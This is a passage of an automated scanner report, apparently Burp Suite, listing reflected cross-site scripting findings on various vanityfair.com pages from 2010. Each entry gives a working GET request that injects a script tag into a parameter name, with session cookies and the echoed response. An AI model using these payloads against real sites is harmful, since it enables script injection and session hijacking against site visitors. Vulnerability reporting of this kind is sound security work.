HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:32 GMT Date: Mon, 29 Nov 2010 16:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106663
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/12/walters-201012?printable=true&b32ea"><script>alert(1)</script>6089bdb47d2=1" title="Print this page"> ...[SNIP]...
1.146. http://www.vanityfair.com/culture/features/incharacter-slideshow [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/incharacter-slideshow
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eebf"><script>alert(1)</script>9a07b0800cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/incharacter-slideshow?2eebf"><script>alert(1)</script>9a07b0800cf=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:46 GMT Date: Mon, 29 Nov 2010 16:47:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/incharacter-slideshow?printable=true&2eebf"><script>alert(1)</script>9a07b0800cf=1" title="Print this page"> ...[SNIP]...
1.147. http://www.vanityfair.com/culture/features/vanities-slideshow [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/vanities-slideshow
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf45b"><script>alert(1)</script>85d7e5c52b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/vanities-slideshow?bf45b"><script>alert(1)</script>85d7e5c52b1=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:37 GMT Date: Mon, 29 Nov 2010 16:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/vanities-slideshow?printable=true&bf45b"><script>alert(1)</script>85d7e5c52b1=1" title="Print this page"> ...[SNIP]...
1.148. http://www.vanityfair.com/culture/yearinreview/hubris-maximus-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/yearinreview/hubris-maximus-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b98"><script>alert(1)</script>cc9aceeffd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/yearinreview/hubris-maximus-201012?f4b98"><script>alert(1)</script>cc9aceeffd7=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:45 GMT Date: Mon, 29 Nov 2010 16:47:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104546
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/yearinreview/hubris-maximus-201012?printable=true&f4b98"><script>alert(1)</script>cc9aceeffd7=1" title="Print this page"> ...[SNIP]...
1.149. http://www.vanityfair.com/culture/yearinreview/year-in-photos-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58d63"><script>alert(1)</script>cc3e346c8b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/yearinreview/year-in-photos-slide-show-201011?58d63"><script>alert(1)</script>cc3e346c8b0=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:43 GMT Date: Mon, 29 Nov 2010 16:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/yearinreview/year-in-photos-slide-show-201011?printable=true&58d63"><script>alert(1)</script>cc3e346c8b0=1" title="Print this page"> ...[SNIP]...
1.150. http://www.vanityfair.com/hollywood/features/2001/10/harry-potter-slide-show-200110 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27037"><script>alert(1)</script>9bfecb7b262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hollywood/features/2001/10/harry-potter-slide-show-200110?27037"><script>alert(1)</script>9bfecb7b262=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:44 GMT Date: Mon, 29 Nov 2010 16:47:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/hollywood/features/2001/10/harry-potter-slide-show-200110?printable=true&27037"><script>alert(1)</script>9bfecb7b262=1" title="Print this page"> ...[SNIP]...
1.151. http://www.vanityfair.com/hollywood/features/2010/11/industrial-light-and-magic-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2ef9"><script>alert(1)</script>796bcab4165 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hollywood/features/2010/11/industrial-light-and-magic-201011?a2ef9"><script>alert(1)</script>796bcab4165=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:43 GMT Date: Mon, 29 Nov 2010 16:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/hollywood/features/2010/11/industrial-light-and-magic-201011?printable=true&a2ef9"><script>alert(1)</script>796bcab4165=1" title="Print this page"> ...[SNIP]...
1.152. http://www.vanityfair.com/hollywood/features/2010/12/cher-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/hollywood/features/2010/12/cher-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 618b7"><script>alert(1)</script>c32966ddacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hollywood/features/2010/12/cher-201012?618b7"><script>alert(1)</script>c32966ddacd=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=299 Expires: Mon, 29 Nov 2010 16:52:45 GMT Date: Mon, 29 Nov 2010 16:47:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/hollywood/features/2010/12/cher-201012?printable=true&618b7"><script>alert(1)</script>c32966ddacd=1" title="Print this page"> ...[SNIP]...
1.153. http://www.vanityfair.com/hollywood/features/2010/12/cher-chutzpah-slide-show-201012 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8818"><script>alert(1)</script>8b6d1b78a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hollywood/features/2010/12/cher-chutzpah-slide-show-201012?f8818"><script>alert(1)</script>8b6d1b78a5=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:43 GMT Date: Mon, 29 Nov 2010 16:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 108316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/hollywood/features/2010/12/cher-chutzpah-slide-show-201012?printable=true&f8818"><script>alert(1)</script>8b6d1b78a5=1" title="Print this page"> ...[SNIP]...
1.154. http://www.vanityfair.com/hollywood/features/2010/12/olivia-wilde-slide-show-201012 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75abb"><script>alert(1)</script>09eb7bc0433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hollywood/features/2010/12/olivia-wilde-slide-show-201012?75abb"><script>alert(1)</script>09eb7bc0433=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:45 GMT Date: Mon, 29 Nov 2010 16:47:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/hollywood/features/2010/12/olivia-wilde-slide-show-201012?printable=true&75abb"><script>alert(1)</script>09eb7bc0433=1" title="Print this page"> ...[SNIP]...
1.155. http://www.vanityfair.com/magazine/2010/12/graydon-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/magazine/2010/12/graydon-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9afd"><script>alert(1)</script>c51e4e36716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /magazine/2010/12/graydon-201012?f9afd"><script>alert(1)</script>c51e4e36716=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:38 GMT Date: Mon, 29 Nov 2010 16:49:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 98925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/magazine/2010/12/graydon-201012?printable=true&f9afd"><script>alert(1)</script>c51e4e36716=1" title="Print this page"> ...[SNIP]...
1.156. http://www.vanityfair.com/magazine/2011/01/60-minutes-poll-201101 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/magazine/2011/01/60-minutes-poll-201101
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9926"><script>alert(1)</script>80200d7a815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /magazine/2011/01/60-minutes-poll-201101?a9926"><script>alert(1)</script>80200d7a815=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:38 GMT Date: Mon, 29 Nov 2010 16:49:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 100484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/magazine/2011/01/60-minutes-poll-201101?printable=true&a9926"><script>alert(1)</script>80200d7a815=1" title="Print this page"> ...[SNIP]...
1.157. http://www.vanityfair.com/magazine/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/magazine/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63ad"><script>alert(1)</script>d3d5348c07e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /magazine/search?c63ad"><script>alert(1)</script>d3d5348c07e=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:39 GMT Date: Mon, 29 Nov 2010 16:49:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 115703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/magazine/search?printable=true&c63ad"><script>alert(1)</script>d3d5348c07e=1" title="Print this page"> ...[SNIP]...
1.158. http://www.vanityfair.com/magazine/toc/contents-201010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/magazine/toc/contents-201010
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc72"><script>alert(1)</script>2302b52587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
